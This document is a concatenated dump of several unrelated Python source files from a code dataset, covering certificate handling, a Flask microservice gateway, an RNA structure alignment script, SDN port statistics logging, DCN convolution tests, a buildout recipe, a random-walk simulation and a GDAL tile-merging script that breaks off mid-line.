self.cacrt_path, b'-crldays',\n str(crldays)], stderr=subprocess.PIPE)\n with open(self.cacrl_path, b'wb') as (fd):\n fd.write(content)\n\n def __get_index_file(self):\n \"\"\"Return a dict [\"serial\"] = [\"serial\", \"V|R\", \"valid_date\", \"revoke_date\", \"cn\", \"key filename\",\n \"req filename\", \"crt filename\"]\n :return:\n :rtype:\n \"\"\"\n result = {}\n with codecs.open(os.path.join(self.dirname, b'index.txt'), b'r', encoding=b'utf-8') as (fd):\n for line in fd:\n if not line:\n continue\n state, valid_date, revoke_date, serial, unused, cn = line.split(b'\\t')\n result[serial] = [serial, state, valid_date, revoke_date, cn, None, None, None]\n\n if os.path.isfile(self.crt_sources_path):\n with codecs.open(self.crt_sources_path, b'r', encoding=b'utf-8') as (fd):\n for line in fd:\n if not line:\n continue\n serial, key, req, crt = line.split(b'\\t')\n result[serial][5] = key\n result[serial][6] = req\n result[serial][7] = crt\n\n return result\n\n def gen_pkcs12(self, entry, filename, password):\n assert isinstance(entry, CertificateEntry)\n self.ensure_certificate(entry)\n with tempfile.NamedTemporaryFile() as (fd):\n fd.write(password.encode(b'utf-8'))\n fd.flush()\n p = subprocess.Popen([settings.OPENSSL_PATH, b'pkcs12', b'-export', b'-out', filename, b'-passout',\n b'file:%s' % fd.name, b'-aes256', b'-in', entry.crt_filename, b'-inkey',\n entry.key_filename, b'-certfile', self.cacrt_path, b'-name', entry.filename])\n p.communicate()","sub_path":"pycfiles/penatesserver-0.7.1.tar/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":25617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"32888753","text":"import json\nimport requests\nfrom requests.exceptions import ConnectionError\nfrom flask import Flask, request, redirect\nfrom utils import send_error, send_response, clean_hh, proxy_to\n\n\napp = Flask(__name__)\n\n\nCOMPANY_SERVICE_URL = 'http://127.0.0.1:9092/'\nROUTE_SERVICE_URL = 'http://127.0.0.1:9093/'\nSESSIONS_SERVICE_URL = 'http://127.0.0.1:9091/'\nAGGREGATOR_SERVICE_URL = 'http://127.0.0.1:9094/'\n\n\n@app.route('/login/', methods=['GET', 'POST'])\ndef login_proxy():\n return proxy_to(request, SESSIONS_SERVICE_URL + 'login/')\n\n\n@app.route('/register/', methods=['GET', 'POST'])\ndef register_proxy():\n return proxy_to(request, SESSIONS_SERVICE_URL + 'register/')\n\n\n@app.route('/authorize/', methods=['GET', 'POST'])\ndef authorize_proxy():\n return proxy_to(request, SESSIONS_SERVICE_URL + 'authorize/')\n\n\n@app.route('/token/', methods=['POST'])\ndef access_token_proxy():\n return proxy_to(request, SESSIONS_SERVICE_URL + 'token/')\n\n\n@app.route('/me/', methods=['GET'])\ndef personal_view():\n try:\n response = requests.get(SESSIONS_SERVICE_URL + 'identify/', headers=clean_hh(request))\n if response.status_code != 200:\n return send_error(request, 403)\n except ConnectionError as e:\n return send_response(request, {'status': 'Session service is down'})\n \n user = response.json()['data']\n headers = {'X_EMAIL': user['email']}\n try:\n response = requests.get(COMPANY_SERVICE_URL + 'companies/', headers=headers)\n if response.status_code == 200:\n companies = json.loads(response.text)\n user['companies'] = companies['data']\n except ConnectionError as e:\n user['companies'] = {'error': 'Company service is down'}\n\t\n try:\n response = requests.get(ROUTE_SERVICE_URL + 'my_routes/', headers=headers)\n if response.status_code == 200:\n routes = json.loads(response.text)\n user['routes'] = routes['data']\n except ConnectionError as e:\n user['routes'] = {'error': 'Routes service is down'}\n\n return send_response(request, {'status': 'OK', 'data': user})\n\n# problem\n@app.route('/route//register/', methods=['POST'])\ndef register_me(route_id):\n try:\n response = requests.get(SESSIONS_SERVICE_URL + 'identify/', headers=clean_hh(request))\n if response.status_code != 200:\n return send_error(request, 403)\n except ConnectionError:\n return send_response(request, {'status': 'Session service is down'})\n \n \n\n user = response.json()['data']\n print({'USER': user})\n \n headers = {}\n \n headers.update({\n 'X_EMAIL': user['email'],\n\t\t'X_SECRET': user['password'],\n\t})\n\t\n print({'HEADERS': headers})\n\t\n try:\n response = requests.post(ROUTE_SERVICE_URL + 'route/%s/register/' % route_id, headers=headers)\n if response.status_code == 200:\n return send_response(request, {'status': 'OK'})\n return send_error(request, response.status_code)\n except ConnectionError:\n return send_response(request, {'status': 'Route service is down'})\n\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', port=9094)\n","sub_path":"lr3_micros/front/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"649187838","text":"import os\nimport re\nfrom filecmp import dircmp\nfrom pathlib import Path\nimport numpy as np\nfrom Bio.PDB import PDBParser\n\nimport unittest\nimport sys\nsys.path.append(\"..\")\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\nfrom Bio.Alphabet import IUPAC, SingleLetterAlphabet\nimport forgi.graph.bulge_graph as fgb\nimport forgi.utilities.debug as fud\nfrom forgi.utilities.exceptions import GraphConstructionError\nimport forgi.utilities.stuff as fus\nimport forgi.threedee.model.coarse_grain as ftmc\n\npunktacja = {'dopasowanie':1, 'niedopasowanie':-1, 'przerwa':-1}\ndef pobranie_PDB():\n print(\"PDB\")\ndef funkcja(string, tmplista):\n parser = PDBParser()\n structure = parser.get_structure('X', string)\n model=structure[0]\n for chain in model:\n tmplista.append([string[-8:-4],chain])\ndef sprawdzDopasowanie(x, y):\n if x == y:\n return punktacja['dopasowanie']\n elif x == \"-\" or y == \"-\":\n return punktacja['przerwa']\n else:\n return punktacja['niedopasowanie']\n\ndef NeedlemanWunsch(seq1, seq2, wyniki):\n m, n = len(seq1), len(seq2)\n punkty = np.zeros((m+1, n+1)) \n # Faza inicjalizacji macierzy---------------------------------------------------------\n for i in range(m+1):\n punkty[i][0] = punktacja['przerwa'] * i\n for j in range(n+1):\n punkty[0][j] = punktacja['przerwa'] * j\n # Wypelnienie macierzy punktacji-------------------------------------------------------\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n przek = punkty[i-1][j-1] + sprawdzDopasowanie(seq1[i-1], seq2[j-1])\n D = punkty[i-1][j] + punktacja['przerwa']\n I = punkty[i][j-1] + punktacja['przerwa']\n punkty[i][j] = max(przek, D, I)\n i = m\n j = n\n dopasowanie_1 = \"\" \n dopasowanie_2 = \"\"\n # Przejscie przez macierz-----------------------------------------------------------\n while (i>0 and j>0):\n punkty_teraz = punkty[i][j]\n punkty_przek = punkty[i-1][j-1]\n punkty_L = punkty[i][j-1]\n punkty_gora = punkty[i-1][j]\n \n if punkty_teraz == punkty_przek + sprawdzDopasowanie(seq1[i-1], seq2[j-1]):\n dop_1 = seq1[i-1]\n dop_2 = seq2[j-1]\n i = i-1\n j = j-1\n elif punkty_teraz == punkty_gora + punktacja['przerwa']:\n dop_1 = seq1[i-1]\n dop_2 = \"-\"\n i -= 1\n elif punkty_teraz == punkty_L + punktacja['przerwa']:\n dop_1 = \"-\"\n dop_2 = seq2[j-1]\n j -= 1\n dopasowanie_1+=dop_1\n dopasowanie_2+=dop_2\n \n while i>0:\n dop_1 = seq1[i-1]\n dop_2 = \"-\"\n dopasowanie_1+=dop_1\n dopasowanie_2+=dop_2\n i -= 1\n while j>0:\n dop_1 = \"-\"\n dop_2 = seq2[j-1]\n dopasowanie_1+=dop_1\n dopasowanie_2+=dop_2\n j -= 1\n \n dopasowanie_1 = dopasowanie_1[::-1]\n dopasowanie_2 = dopasowanie_2[::-1]\n sekwencja = len(dopasowanie_1)\n punktacjaSekwencji = 0\n identycznosc = 0\n for i in range(sekwencja):\n dop_1 = dopasowanie_1[i]\n dop_2 = dopasowanie_2[i]\n if dop_1 == dop_2:\n identycznosc += 1\n punktacjaSekwencji += sprawdzDopasowanie(dop_1, dop_2)\n else: \n punktacjaSekwencji += sprawdzDopasowanie(dop_1, dop_2)\n \n identycznosc = identycznosc/sekwencja * 100\n wy = ' '.join(['Po dopasowaniu', '\\nsekwencja 1:', str(dopasowanie_1), '\\nsekwencja 2:', str(dopasowanie_2), '\\nProcent identycznosci:', str(identycznosc), '\\nPunktacja:', str(punktacjaSekwencji), '\\n'])\n wyniki.write(wy)\n\n print(\"Po dopasowaniu\")\n print(\"sekwencja 1:\",dopasowanie_1)\n print(\"sekwencja 2:\",dopasowanie_2)\n print(\"Procent identycznosci: %2.1f\" % identycznosc)\n print(\"Punktacja:\", punktacjaSekwencji)\n \n return identycznosc\n\n \n\ndef metrykaGory(S1, S2):\n vS1 = []\n vS2 = []\n S1c = 0\n S2c = 0\n\n for j in S1:\n if j == '(': \n S1c+=1\n vS1.append(S1c)\n elif j == ')':\n S1c-=1\n vS1.append(S1c)\n else:\n vS1.append(S1c)\n\n for j in S2:\n if j == '(': \n S2c+=1\n vS2.append(S2c)\n elif j == ')':\n S2c-=1\n vS2.append(S2c)\n else:\n vS2.append(S2c)\n\n return abs(sum(vS1)-sum(vS2))\n\ndef metryka(s1, s2): #procent niezgodnych pozycji\n if len(s1)!=len(s2):\n return 100\n d=0\n for i in range(len(s1)):\n if s1[i]!=s2[i]:\n d=d+1\n return 100*d/len(s1)\ndef hamming_distance(s1, s2):\n if len(s1) != len(s2):\n raise ValueError(\"Undefined for sequences of unequal length\")\n return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))\ndef get_pdb_file(PDBlist2,path):\n pdbl = PDBList()\n for i in PDBlist2:\n #pdbl.retrieve_pdb_file(i)\n pdbl.retrieve_pdb_file(i, file_format=\"pdb\",pdir=path)\n #pdbl.update_pdb()\ndef convert_pdb_to_fasta_tring(pdb_file):\n cg = ftmc.from_pdb(pdb_file)\n return cg.to_fasta_string()\n \ndef check_lancuchow(pdb_file):\n amino_code = {\n\t'ALA':'A', 'ARG':'R', 'ASN':'N', 'ASP':'D',\n\t'CYS':'C', 'GLN':'Q', 'GLU':'E', 'GLY':'G',\n\t'ILE':'I', 'LEU':'L', 'LYS':'K', 'MET':'M',\n\t'PHE':'F', 'PRO':'P', 'SER':'S', 'THR':'T',\n\t'TRP':'W', 'TYR':'Y', 'VAL':'V', 'HIS':'H',\n\t'ASX':'B', 'GLX':'Z', 'UNK':'K'\n }\n fa = {}\n with open(pdb_file) as fh:\n for buff in fh:\n if (buff[0:4] != 'ATOM'):\n continue\n chain_name = buff[21:22]\n res_number = int(buff[22:26])\n amino_acid = buff[17:20]\n if not (chain_name in fa):\n fa[chain_name] = []\n aa = 'X'\n if (amino_acid in amino_code):\n aa = amino_code[amino_acid]\n if (len(fa[chain_name]) != res_number):\n fa[chain_name] += ['X'] * (res_number - len(fa[chain_name]))\n fa[chain_name][res_number - 1] = aa\n for k, v in sorted(fa.items()):\n\t#print (len(k))\n if not(len(fa) >=2 and set(''.join(v))=={'X'}): \n return False\n return True\n\ndef drzewoDFS(elem):\n print(\"wejscie: \", elem)\n\n #return wyjscie\ndef utworzZbiorZPliku(sciezka):\n f = open(sciezka, \"r\")\n print(f.name)\n struktury = []\n \n for lin in f:\n struktury.append(lin)\n return struktury\nif __name__ == \"__main__\":\n path = Path('/pdb')\n lista = list(path.glob('**/*.ent'))\n\n sciezka='/pdb'\n parser = PDBParser()\n \n import Bio\n from Bio.PDB import PDBList\n listaLancuchow=[]\n PDBlist1=[]\n \n PDBlist=['1EVV','1EHZ','1ESY','1DDY','2G1W','1ALK','2lbk','3g78','4jkw']\n #pdbl = PDBList()\n get_pdb_file(PDBlist,path)\n for i in lista:\n if check_lancuchow(i) is True:\n PDBlist1.append(i)\n print(i)\n lista_struktury = 'pdb/Struktury.txt'\n listy_struktury = utworzZbiorZPliku(lista_struktury)\n bg1 = fgb.BulgeGraph()\n bg2 = fgb.BulgeGraph()\n \n _1evv_ ='(((((((..((((.....[..)))).((((.........)))).....(((((..]....))))))))))))....'\n _1ehz_ ='(((((((..((((.....[..)))).((((.........)))).....(((((..]....))))))))))))....'\n _1esy_ = '((((.((....))..))))'\n _1ddy_ ='......[[[.{((....((]]]...).).}.))..'\n _2g1w_ = '((((.[[..))))......]]'\n _2lbk_ ='.(((((.....))))).'\n _1clq_ ='(((((......(((....(((....)))....)))...)))))'\n _1f7g_ ='((((((.(((((....)))))))))))'\n _1f79_ ='.(((((.(((((....)))))))))).'\n listy = list([_1evv_,_1ehz_,_1esy_,_1ddy_,_2g1w_,_2lbk_,_1f7g_,_1f79_])\n bg = fgb.BulgeGraph()\n path_wynik =r\"wynik/wyniki.txt\"\n \n wyniki = open(path_wynik, \"w\")\n #wyj=''\n for ind, z in enumerate(listy):\n bg.from_dotbracket(z)\n elem_str = bg.to_element_string()\n print(\"struktury\",ind+1,\":\", z)\n print(\" \",elem_str)\n wyj = ' '.join(['struktury',str(ind+1),':', str(z) , '\\n',' ',str(elem_str)])\n #wyniki.write(wyj)\n #wynik1 =''\n for ind, z in enumerate(listy):\n for ind2, z2 in enumerate(listy):\n if ind == ind2:\n continue\n bg1.from_dotbracket(z)\n elem_str1 = bg1.to_element_string()\n bg2.from_dotbracket(z2)\n elem_str2 = bg2.to_element_string()\n print(\"=============================================================================================\\n\")\n print(\"odleglosc struktury\", ind+1, \"od struktury\", ind2+1, \"wynosi\")\n NeedlemanWunsch(elem_str1, elem_str2, wyniki)\n print(\"metryka gory:\", metrykaGory(z, z2))\n print(\"metryka procent niezgodnych pozycji:\",metryka(z, z2))\n print(\"=============================================================================================\\n\")\n ##wyniki.write(wynik1)\n","sub_path":"Zad1_Bioinformatyka.py","file_name":"Zad1_Bioinformatyka.py","file_ext":"py","file_size_in_byte":8970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"115603319","text":"import requests\nimport csv\nimport json\nimport time\n\narray_num = 1\n\n# Create csn file\ncsv_open = csv.writer(open(\"attack2.csv\",\"wb+\"))\ncsv_open.writerow([\"port_no\",\n \"rx_packets\",\n \"tx_packets\",\n \"rx_bytes\",\n \"tx_bytes\",\n \"rx_dropped\",\n \"tx_dropped\",\n \"rx_errors\",\n \"tx_errors\",\n \"rx_frame_err\",\n \"rx_over_err\",\n \"rx_crc_err\",\n \"collisions\",\n \"duration_sec\",\n \"duration_nsec\"\n ])\n\nlatest_rx_packets = 0\nlatest_tx_packets = 0\nlatest_rx_bytes = 0\nlatest_tx_bytes = 0\nlatest_rx_dropped = 0\nlatest_tx_dropped = 0\nlatest_rx_errors = 0\nlatest_tx_errors = 0\nlatest_rx_frame_err = 0\nlatest_rx_over_err = 0\nlatest_rx_crc_err = 0\nlatest_collisions = 0\nlatest_duration_sec = 0\nlatest_duration_nsec = 0\n\npenultimate_rx_packets = 0\npenultimate_tx_packets = 0\npenultimate_rx_bytes = 0\npenultimate_tx_bytes = 0\npenultimate_rx_dropped = 0\npenultimate_tx_dropped = 0\npenultimate_rx_errors = 0\npenultimate_tx_errors = 0\npenultimate_rx_frame_err = 0\npenultimate_rx_over_err = 0\npenultimate_rx_crc_err = 0\npenultimate_collisions = 0\npenultimate_duration_sec = 0\npenultimate_duration_nsec = 0\n\ndiff_rx_packets = 0\ndiff_tx_packets = 0\ndiff_rx_bytes = 0\ndiff_tx_bytes = 0\ndiff_rx_dropped = 0\ndiff_tx_dropped = 0\ndiff_rx_errors = 0\ndiff_tx_errors = 0\ndiff_rx_frame_err = 0\ndiff_rx_over_err = 0\ndiff_rx_crc_err = 0\ndiff_collisions = 0\ndiff_duration_sec = 0\ndiff_duration_nsec = 0\n\n# Write to file\nfor x in range (20):\n print(x)\n time.sleep(1)\n\n # Send request\n response = requests.get('http://localhost:8080/stats/port/1')\n\n if response.status_code != 200:\n print(\"Failed to get data: \", response.status_code)\n else:\n data = response.json()\n\n penultimate_rx_packets = latest_rx_packets\n penultimate_tx_packets = latest_tx_packets\n penultimate_rx_bytes = latest_rx_bytes\n penultimate_tx_bytes = latest_tx_bytes\n penultimate_rx_dropped = latest_rx_dropped\n penultimate_tx_dropped = latest_tx_dropped\n penultimate_rx_errors = latest_rx_errors\n penultimate_tx_errors = latest_tx_errors\n penultimate_rx_frame_err = latest_rx_frame_err\n penultimate_rx_over_err = latest_rx_over_err\n penultimate_rx_crc_err = latest_rx_crc_err\n penultimate_collisions = latest_collisions\n penultimate_duration_sec = latest_duration_sec\n penultimate_duration_nsec = latest_duration_nsec\n\n latest_rx_packets = data[\"1\"][array_num][\"rx_packets\"]\n latest_tx_packets = data[\"1\"][array_num][\"tx_packets\"]\n latest_rx_bytes = data[\"1\"][array_num][\"rx_bytes\"]\n latest_tx_bytes = data[\"1\"][array_num][\"tx_bytes\"]\n latest_rx_dropped = data[\"1\"][array_num][\"rx_dropped\"]\n latest_tx_dropped = data[\"1\"][array_num][\"tx_dropped\"]\n latest_rx_errors = data[\"1\"][array_num][\"rx_errors\"]\n latest_tx_errors = data[\"1\"][array_num][\"tx_errors\"]\n latest_rx_frame_err = data[\"1\"][array_num][\"rx_frame_err\"]\n latest_rx_over_err = data[\"1\"][array_num][\"rx_over_err\"]\n latest_rx_crc_err = data[\"1\"][array_num][\"rx_crc_err\"]\n latest_collisions = data[\"1\"][array_num][\"collisions\"]\n latest_duration_sec = data[\"1\"][array_num][\"duration_sec\"]\n latest_duration_nsec = data[\"1\"][array_num][\"duration_nsec\"]\n\n diff_rx_packets = latest_rx_packets - penultimate_rx_packets\n diff_tx_packets = latest_tx_packets - penultimate_tx_packets\n diff_rx_bytes = latest_rx_bytes - penultimate_rx_bytes\n diff_tx_bytes = latest_tx_bytes - penultimate_tx_bytes\n diff_rx_dropped = latest_rx_dropped - penultimate_rx_dropped\n diff_tx_dropped = latest_tx_dropped - penultimate_tx_dropped\n diff_rx_errors = latest_rx_errors - penultimate_rx_errors\n diff_tx_errors = latest_tx_errors - penultimate_tx_errors\n diff_rx_frame_err = latest_rx_frame_err - penultimate_rx_frame_err\n diff_rx_over_err = latest_rx_over_err - penultimate_rx_over_err\n diff_rx_crc_err = latest_rx_crc_err - penultimate_rx_crc_err\n diff_collisions = latest_collisions - penultimate_collisions\n diff_duration_sec = latest_duration_sec - penultimate_duration_sec\n diff_duration_nsec = latest_duration_nsec - penultimate_duration_nsec\n\n\n csv_open.writerow([data[\"1\"][array_num][\"port_no\"],\n diff_rx_packets,\n diff_tx_packets,\n diff_rx_bytes,\n diff_tx_bytes,\n diff_rx_dropped,\n diff_tx_dropped,\n diff_rx_errors,\n diff_tx_errors,\n diff_rx_frame_err,\n diff_rx_over_err,\n diff_rx_crc_err,\n diff_collisions,\n diff_duration_sec,\n diff_duration_nsec])\n","sub_path":"data_mining_scripts/port/old/sdn_port_timed.py","file_name":"sdn_port_timed.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"411782031","text":"\r\nimport _init_paths\r\nimport torch\r\nimport torch.nn as nn\r\nfrom models.networks.DCNv2.dcn_v2 import DCNv2, DCN, dcn_v2_conv\r\nfrom models.networks.corner_pool_utils import RCN_NEW, RCN_NEW_XV\r\nfrom models.networks.DCNv2_xv.modules.modulated_deform_conv import ModulatedDeformConv\r\nimport numpy as np\r\n\r\nkH = 3\r\nkW = 1\r\nkernel = (kH,kW)\r\npH = 1\r\npW = 0\r\npadding = (pH,pW)\r\niH = iW = 3\r\noH = (iH + 2 * pH - kH)//1 +1\r\noW = (iW + 2 * pW - kW)//1 +1\r\n\r\ndeformable_groups = 1\r\nN, inC, inH, inW = 1, 1, 3, 3\r\noutC = 1\r\ndef check_mdconv_zero_offset():\r\n conv_offset = nn.Conv2d(inC, deformable_groups * 2 * kH * kW,\r\n kernel_size=(kH, kW),\r\n stride=(1, 1),\r\n padding=(pH, pW),\r\n bias=True).cuda()\r\n\r\n conv_mask = nn.Conv2d(inC, deformable_groups * 1 * kH * kW,\r\n kernel_size=(kH, kW),\r\n stride=(1, 1),\r\n padding=(pH, pW),\r\n bias=True).cuda()\r\n\r\n dcn = ModulatedDeformConv(inC, outC, (kH, kW),\r\n stride=1, padding=(pH, pW), dilation=1,\r\n groups=1,\r\n deformable_groups=deformable_groups, im2col_step=1).cuda()\r\n pcn = nn.Conv2d(inC, outC, (kH, kW), stride=1, padding=(pH, pW), dilation=1, groups=1).cuda()\r\n pcn.weight = dcn.weight\r\n pcn.bias = dcn.bias\r\n print((pcn.weight.data - dcn.weight.data).abs().max())\r\n\r\n conv_offset.weight.data.zero_()\r\n conv_offset.bias.data.zero_()\r\n conv_mask.weight.data.zero_()\r\n conv_mask.bias.data.zero_()\r\n\r\n input = torch.randn(N, inC, inH, inW).cuda()\r\n offset = conv_offset(input)\r\n mask = conv_mask(input)\r\n mask = torch.sigmoid(mask)\r\n mask *= 2\r\n output_d = dcn(input, offset, mask)\r\n output_p = pcn(input)\r\n d = (output_d - output_p).abs().max()\r\n if d < 1e-5:\r\n print('mdconv zero offset passed with {}'.format(d))\r\n else:\r\n print('mdconv zero offset failed with {}'.format(d))\r\n # print(output_p)\r\n # print(output_d)\r\n print((output_d - output_p).abs())\r\n\r\n# check_mdconv_zero_offset()\r\ntest_rcn_xv = RCN_NEW_XV(1, 1, kernel, stride=1, padding=padding, bias=False).cuda()\r\n\r\ninput = torch.arange(0,iH*iW).view(1,1,iH,iW).cuda().float()\r\ninput[0,0,2,1] = 9\r\ninput[0,0,1,2] = 10\r\nnn.init.constant_(test_rcn_xv.weight, 1.0)\r\nangle = torch.zeros_like(input)\r\n# offset = [0,0,0,0,0,0,0,0,0,0]\r\noffset = [0,0,0,0,0,0]\r\noffset = torch.Tensor(offset).view(2*kH*kW,1)\r\noffset = offset.expand(2*kH*kW,oH*oW).contiguous().view(-1).view(1,2*kH*kW,oH,oW).cuda()\r\nmask = torch.ones(N,kH*kW,oH,oW).cuda()\r\noutput_xv = test_rcn_xv(input, angle, offset, mask)\r\n\r\n# offset1 = [-2,2,-1,1,0,0,1,-1,2,-2]\r\n# offset1 = [-1,1,0,0,1,-1]\r\noffset1 = [1,1,0,0,-1,-1]\r\noffset1= torch.Tensor(offset1).view(2*kH*kW,1)\r\noffset1 = offset1.expand(2*kH*kW,oH*oW).contiguous().view(1,2*kH*kW,oH,oW).cuda()\r\noutput1_xv = test_rcn_xv(input, angle, offset1, mask)\r\n\r\n\r\nangle1 = torch.ones_like(input)*np.pi*0.5\r\noutput1_ang_xv = test_rcn_xv(input, angle1)\r\n\r\nangle2 = torch.ones_like(input)*np.pi*1.0\r\noutput2_ang_xv = test_rcn_xv(input, angle2)\r\n\r\nangle3 = torch.ones_like(input)*np.pi*1.5\r\noutput3_ang_xv = test_rcn_xv(input, angle3)\r\n\r\n\r\n# weight = torch.Tensor([1,0,0,1,0,0,1,0,0]).view(1,1,3,3,).cuda()\r\n# test_rcn.weight.data=weight\r\n# output3 = test_rcn(input, angle)\r\n# output4 = test_rcn(input, angle1)\r\n#\r\n# angle2 = torch.ones_like(input)*np.pi*1.0\r\n# output5 = test_rcn(input, angle2)\r\n#\r\n# angle3 = torch.ones_like(input)*np.pi*1.5\r\n# output6 = test_rcn(input, angle3)\r\n\r\nprint('done.')","sub_path":"src/test_dcn_v2.py","file_name":"test_dcn_v2.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"378386167","text":"import os\nimport logging\n\nclass Mkdir:\n\n def __init__(self, buildout, name, options):\n self.buildout = buildout\n self.name = name\n self.options = options\n options['path'] = os.path.join(\n buildout['buildout']['directory'],\n options['path'],\n )\n if not os.path.isdir(os.path.dirname(options['path'])):\n logging.getLogger(self.name).error(\n 'Cannot create %s. %s is not a directory.',\n options['path'], os.path.dirname(options['path']))\n raise zc.buildout.UserError('Invalid Path')\n\n def install(self):\n path = self.options['path']\n if not os.path.isdir(path):\n logging.getLogger(self.name).info(\n 'Creating directory %s', os.path.basename(path))\n os.mkdir(path)\n return ()\n\n def update(self):\n pass\n\n","sub_path":"lovely.recipe/tags/0.3.1b1/src/lovely/recipe/fs/mkdir.py","file_name":"mkdir.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"104726505","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\n\ndef main(args):\n\t# Get command line arguments\n\twalk = args.walk\n\tcar = args.car\n\texample = args.example\n\tx0 = args.x0\n\tabort = False\n\n\tif walk == True:\n\t\t# Load example data or data given by user\n\t\tif example:\n\t\t\tT = [50,100,200,300]\n\t\t\tnu = [0.005,0.01,0.05,0.1]\n\t\telse:\n\t\t\tT = args.T\n\t\t\tnu = args.n\n\t\t\tif T is None:\n\t\t\t\tprint('Please enter at least one target point in time or set to --example')\n\t\t\t\tabort = True\n\t\t\tif nu is None:\n\t\t\t\tprint('Please enter at least one noise variance or set to --example')\n\t\t\t\tabort = True\n\n\t\t# If user has given reasonable data, continue\n\t\tif not abort:\n\t\t\t# Initialize grid for plotting\n\t\t\tf, axarr = plt.subplots(len(T),len(nu))\n\n\t\t\t# Loop over every target point in time\n\t\t\tfor i,target in enumerate(T):\n\t\t\t\t# Create time vector from 1 (0) until target for looping (plotting)\n\t\t\t\tx = np.arange(start = 1, stop=target)\n\t\t\t\tx_plot = np.arange(start = 0, stop=target)\n\n\t\t\t\t# Loop over every noise variance\n\t\t\t\tfor j,var in enumerate(nu):\n\t\t\t\t\t# Start at x_0\n\t\t\t\t\trandom_walk = [x0]\n\n\t\t\t\t\t# Loop over time\n\t\t\t\t\tfor step in x:\n\t\t\t\t\t\t# Compute optimal control and draw random noise from Gaussian, save in random_walk\n\t\t\t\t\t\tu_star = (np.tanh(random_walk[-1]/var*(target-step))-random_walk[-1])/(target-step)\n\t\t\t\t\t\txi = np.random.normal(loc=0.0, scale=var, size=None)\n\t\t\t\t\t\trandom_walk.append(u_star + xi)\n\n\t\t\t\t\t# Plot random walk and target locations\n\t\t\t\t\taxarr[i,j].plot(x_plot,random_walk)\n\t\t\t\t\taxarr[i,j].plot(x_plot,np.ones((len(random_walk),1)))\n\t\t\t\t\taxarr[i,j].plot(x_plot,(-1)*np.ones((len(random_walk),1)))\n\t\t\t\t\taxarr[i,j].set_xlabel('Timesteps ' + r'$t$')\n\t\t\t\t\taxarr[i,j].set_ylabel('Location ' + r'$x$')\n\t\t\t\t\taxarr[i,j].set_title(r'$T$' + '=' + str(T[i]) +' ' r'$\\nu$'+ '=' + str(nu[j]))\n\n\t\t\tf.suptitle('Random walk with dynamics ' + r'$dx = udt+d\\xi$' + '\\n' + 'Optimal control is ' + r'$u*(x,t)=\\frac{tanh(\\frac{x}{\\nu(T-t)})-x}{T-t}$' + '\\n' + 'Target location at ' + r'$t=T$' + ' is ' + r'$x = \\pm 1$'\n\t\t\t\t, fontsize=14)\n\t\t\tplt.show()\n\telif car == True:\n\t\tprint('car')\n\telse:\n\t\tprint('Please choose one exercise you want to execute')\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser(description='Simulate a controlled random walk in one dimension')\n\tparser.add_argument('--walk', dest='walk', action='store_true', help='Set to execute random walk exercise')\n\tparser.set_defaults(walk=False)\n\tparser.add_argument('--car', dest='car', action='store_true', help='Set to execute mountain car exercise')\n\tparser.set_defaults(car=False)\n\tparser.add_argument('--example', dest='example', action='store_true', help='Set to execute with example values')\n\tparser.set_defaults(example=False)\n\tparser.add_argument('--x0', type=int,default =0,\n help='RANDOM WALK: Starting point (default = 0)')\n\tparser.add_argument('--T', nargs='+', type=int,\n help='RANDOM WALK: Target point(s) in time')\n\tparser.add_argument('--n', nargs='+',type=float,\n help='RANDOM WALK: Noise variance(s)')\n\targs = parser.parse_args()\n\n\tmain(args)","sub_path":"RandomWalk.py","file_name":"RandomWalk.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"240066760","text":"#! /usr/bin/python\n\n# make sure the following modules are loaded \n#~ $ module load eb\n#~ $ module load GDAL\n#~ $ . /home/edwin/bin-special/pcraster-4.1.0-beta-20151027_x86-64_gcc-4/bashrc_special_pcraster_modflow\n\nimport os\nimport sys\nimport gdal\nimport pcraster as pcr\n\nimport virtualOS as vos\n\n# give your tile code as the system argument\ntile_code = \"dem_tif_n60w180\"\ntile_code = sys.argv[1]\n\n\ninput_folder = \"/projects/0/dfguu/users/sandrahw/download/\" + tile_code\noutput_folder = \"/projects/0/dfguu/users/sandrahw/MERIT_upscaled_30sec/\" + tile_code\n\n# make and set the directory to the output folder\ncmd = \"mkdir -p \" + output_folder\nprint(cmd); os.system(cmd)\nos.chdir(output_folder)\n# - cleaning the output folder\ncmd = \"rm -r \" + output_folder + \"/*\"\nprint(cmd); os.system(cmd)\n\n# merge all tif files\ninput_tif_files = input_folder + \"/*\"\noutput_file = output_folder + \"/\" + tile_code + \".tif\"\ncmd = \"python /hpc/eb/RedHatEnterpriseServer7/GDAL/2.2.3-foss-2017b-Python-2.7.14/bin/gdal_merge.py -o \" + output_file + \" \" + input_tif_files \nprint(cmd); os.system(cmd)\n#\n# - then convert it to a pcraster file:\ninput_tif_file = output_file\noutput_file = output_folder + \"/\" + tile_code + \".map\"\ncmd = \"gdal_translate -of PCRaster \" + input_tif_file + \" \" + output_file\nprint(cmd); os.system(cmd)\n# - this is an original input pcraster map at 3 arc sec resolution\n\n\n# prepare the clone map at 30 arc sec resolution (e.g. $ mapattr -s -R 1800 -C 3600 -B -P yb2t -x -180 -y 75 -l 0.008333333333333333333333333333333333333333333333333333 dem_tif_n60w180.30sec.clo.map)\nnum_of_rows_30sec = str(vos.getMapAttributesALL(output_file)[\"rows\"] / 10.)\nnum_of_cols_30sec = str(vos.getMapAttributesALL(output_file)[\"cols\"] / 10.)\nx_coordinate = 